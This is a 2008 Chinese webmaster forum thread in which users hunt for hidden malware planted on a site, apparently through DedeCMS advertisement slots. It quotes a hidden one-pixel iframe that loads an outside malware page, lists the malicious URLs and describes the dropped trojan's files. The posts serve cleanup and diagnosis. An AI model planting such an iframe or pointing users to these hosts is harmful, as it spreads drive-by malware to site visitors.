过期域名预定抢注

 找回密碼
 免费注册

webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到?

[複製鏈接]
發表於 2008-1-10 16:50:35 | 顯示全部樓層
請老大仔細的查查吧,剛又發現了幾個,全是免殺的~~一個勁的往外蹦,但是我的卡卡即不報~~: Z2 ]7 u2 E% L3 A
http://ppp.749571.com/dm/test.htm
) ]  g: y+ F5 w! `! |6 F8 {http://www.985676.cn/encrypt/mm.htm
1 [# ~8 x1 Q% r, T這兩個是免殺的,還有幾個沒記下來,
- j8 H0 Y  i/ ?( k+ \這掛馬的兔崽子有一手,隱藏的很好啊~~一般人都看不出來~
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 17:01:37 | 顯示全部樓層
會在C盤下產生 CRESS1.EXE
; o* K+ b! k. v& W. h然後增加IE的BHO的木馬 還釋放驅動
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 17:34:02 | 顯示全部樓層
昏 他藏得好隱秘  找到了 放毒得地方了' O2 P' d; d& q

/ t) L& }- a% |6 R4 @) @8 _iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
  I. B1 C2 v3 ]2 y然後再這個地址轉到ppp.749571.co m/dm/test.htm. o/ b5 X8 a. M. [2 W5 Z
為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。: Z+ K1 x. V9 m5 O$ D2 z, E) }, T6 u
靜水趕快清理了吧
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-10 18:00:24 | 顯示全部樓層
原帖由 20082008 於 2008-1-9 16:33 發表 * x( p- @! `1 R' C  C+ C
沒裝REAL就沒事,好在我重新裝的系統:

  \$ x% s& y& m* C) x# y4 P說的沒錯
回復 给力 爆菊

使用道具 舉報

 樓主| 發表於 2008-1-11 02:27:32 | 顯示全部樓層
原帖由 freelzyr 於 2008-1-10 16:47 發表
  |, ?: U- Z/ f; `0 v進dede後台 " x# ^3 F$ W/ P* }% M6 G; M5 P
檢查 ad_js.php?aid=1  
* A" a$ u, G0 Uad_js.php?aid=2
8 _! s* M+ s0 U6 d0 U& H/ \ad_js.php?aid=3
+ D8 _8 w7 P( Z9 b0 X' _ad_js.php?aid=4
" X: p; O2 O6 S7 `6 z, @$ S* R' Y; o
這幾個廣告 裡面的代碼
1 ?& S+ p  g7 Z在這幾個 掉茅廁位 裡面   含有 木馬的 代碼
4 r: `$ @) G) v' G0 ~) h8 ^1 E

/ G0 C% B$ `# w5 K! `這個檢查了沒有的
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-11 09:09:11 | 顯示全部樓層
原帖由 靜水流深 於 2008-1-11 02:27 發表
5 y8 ~: [- ]& Y7 \9 T4 L) {
9 K1 n  T; u, Q1 G+ c6 {2 O3 B# E0 V" ?5 o( _8 S" S4 Q
這個檢查了沒有的
) g2 Z9 o9 _9 _, `/ i3 z4 ]% Z

+ e: h- S( e  c6 ^0 p6 j# F  l; D
1 J+ _- \; Q5 x- A" C8 }我看過了,有掛馬的代碼,代碼已經在你的另一個貼子裡貼出來了
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-11 12:44:57 | 顯示全部樓層
原帖由 靜水流深 於 2008-1-11 02:27 發表
9 K0 T# d( V5 Z4 Q+ h- l. M! U1 e. r* |  @( D" d% t# I

: n2 Z1 D9 X- o% ?2 {0 A; j這個檢查了沒有的
! o6 p6 ]) P7 }8 ^2 q
木馬就是在這裡裡啊$ s% c' I2 }6 q+ m/ `+ z. L8 F: k6 U
在後台的掉茅廁位設置那9 e/ S4 A% _- ?: [& q  T, q& T
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-30 10:38:22 | 顯示全部樓層
現在明瞭.
" K/ K8 Y" r( X# x8 S7 R有人收流量做ppp.749571.co m的..
! F1 O! v* d# E最近被掛馬的話. 都改成js了. 不用iframe了
回復 给力 爆菊

使用道具 舉報

發表於 2008-1-30 11:53:15 | 顯示全部樓層
菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景
回復 给力 爆菊

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 免费注册

本版積分規則

过期高净值品牌域名预定抢注

點基

GMT+8, 2025-11-28 05:43

By DZ X3.5

小黑屋

快速回復 返回頂部 返回列表